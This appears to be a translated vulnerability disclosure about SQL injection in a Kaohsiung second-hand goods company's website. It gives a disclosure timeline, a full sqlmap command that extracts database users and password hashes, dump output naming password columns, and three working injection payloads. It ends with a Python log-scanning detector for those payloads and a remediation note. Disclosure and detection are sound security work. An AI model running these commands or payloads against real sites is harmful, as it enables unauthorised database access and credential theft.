2015-11-09: Details reported to the vendor; awaiting vendor handling
2015-11-12: Vendor confirmed; details disclosed to the vendor only
2015-11-22: Details disclosed to core white-hats and relevant domain experts
2015-12-02: Details disclosed to regular white-hats
2015-12-12: Details disclosed to intern white-hats
2015-12-27: Details disclosed to the public
Kaohsiung Purchase is an honest, professionally run team that buys and sells all kinds of houses, land, inventory and liquidation stock across every district of Kaohsiung, including furniture, home appliances, liquor, stamps and coins, jewelry, rings, K-gold, gold, chicken-blood stone, Shoushan stone, luxury watches, valuable calligraphy and paintings, gifts, gift vouchers, brand-name bags, luxury goods, accessories, restaurant equipment, antiques, jade, cars, motorcycles, columbarium niches, salon chairs, hardware, etc. Any valuable collectible can be appraised and bought free of charge at your home or a designated company, at a high price; both second-hand and brand-new items are accepted.
Address: http://**.**.**.**/front/bin/ptlist.phtml?Category=8087
python sqlmap.py -u "http://**.**.**.**/front/bin/ptlist.phtml?Category=8087" -p Category --technique=BET --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass
current user: 'root@localhost'
current user is DBA: True
database management system users [5]:
[*] ''@'**.**.**.**'
[*] ''@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [2]:
    password hash: *D952E90FED3FF853919FB6117880EF6FF58C053F
    password hash: NULL

Database: ezcatdb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| word_dict                             | 388826  |
| info_dict                             | 128915  |

Database: ezcatdb
Table: sys_ctrl
[271 entries]
+--------------------------+----------------------+------------------+
| sys_cashflow1_cvs_passwd | sys_cashflow1_passwd | sys_forgetpasswd |

Database: ezcatdb
Table: usr_mstr
[918 entries]
+----------------+---------------+---------------+---------------+-----------------+
| usr_passwd     | usr_passwd2   | usr_passwd3   | usr_passwd4   | usr_resetpasswd |

Database: ezcatdb
Table: sys_ctrl_lcs
[272 entries]
+----------------+-----------------+
| sys_passwd     | sys_resetpasswd |

Database: ezcatdb
Table: cm_mstr
[33420 entries]
+----------------+----------------+
| cm_passwd      | cm_resetpasswd |

Database: itenginedb
Table: cm_mstr
[270 entries]
+-----------+
| cm_passwd |
---
Parameter: Category (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Category=8087 AND 2806=2806

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: Category=8087 AND (SELECT 1931 FROM(SELECT COUNT(*),CONCAT(0x71626a7671,(SELECT (ELT(1931=1931,1))),0x716a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: Category=8087 AND SLEEP(5)
---
web application technology: Apache, PHP 5.2.8
back-end DBMS: MySQL 5.0
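As an added defender's illustration (not part of the original report), this is the check a WAF rule or log monitor would apply to this endpoint: it parses Apache access-log lines, flags the three sqlmap payload shapes shown above (boolean tautology, FLOOR(RAND(0)*2) GROUP BY error-based, SLEEP), and separately flags any non-integer value for Category, which is a numeric id. The path allowlist, the log lines and the RFC 5737 client addresses are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures for the three sqlmap techniques (B, E, T) in the report above: boolean
# tautology, error-based FLOOR(RAND(0)*2) GROUP BY, and SLEEP()-based delay.
SQLI_SIGNATURES = {
    "boolean-blind": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}
# Assumed per-path allowlist: Category is a numeric id, so any non-digit value is anomalous.
INTEGER_PARAMS = {"/front/bin/ptlist.phtml": {"Category"}}
# Apache combined log: client ident user [time] "method target proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d+')


def classify_request(target):
    """Return (param, reason) findings for one request target (path + query string)."""
    parts = urlsplit(target)
    findings = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:  # parse_qs percent-decodes and maps '+' to space
            for label, rx in SQLI_SIGNATURES.items():
                if rx.search(value):
                    findings.append((name, label))
            if name in INTEGER_PARAMS.get(parts.path, ()) and not value.isdigit():
                findings.append((name, "non-integer"))
    return findings


def scan_log(lines):
    """Return (ip, param, reason) alerts for every parsable access-log line."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            alerts.extend((m["ip"], p, r) for p, r in classify_request(m["target"]))
    return alerts


# Constructed sample lines (RFC 5737 test addresses); payloads are URL-encoded as a client sends them.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Nov/2015:10:15:02 +0800] "GET /front/bin/ptlist.phtml?Category=8087 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Nov/2015:10:16:11 +0800] "GET /front/bin/ptlist.phtml?Category=8087%20AND%202806%3D2806 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Nov/2015:10:16:12 +0800] "GET /front/bin/ptlist.phtml?Category=8087%20AND%20(SELECT%201931%20FROM(SELECT%20COUNT(*),CONCAT(0x71626a7671,(SELECT%20(ELT(1931%3D1931,1))),0x716a6b7171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 311 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Nov/2015:10:16:18 +0800] "GET /front/bin/ptlist.phtml?Category=8087%20AND%20SLEEP(5) HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]
```

The integer allowlist is the same check the application should enforce before the value reaches the query (ideally with a parameterized statement); a WAF signature alone leaves the string-built query in place. Several distinct technique labels from one client in quick succession, as in the sample, is the footprint of an automated scanner rather than a single manual probe.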
Remediation: deploy a WAF.
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-11-12 18:50
Thanks for the report.
2016-01-07: After receiving the report, HITCON emailed the service mailbox listed on the website twice, but had received no reply by the time the vulnerability was published.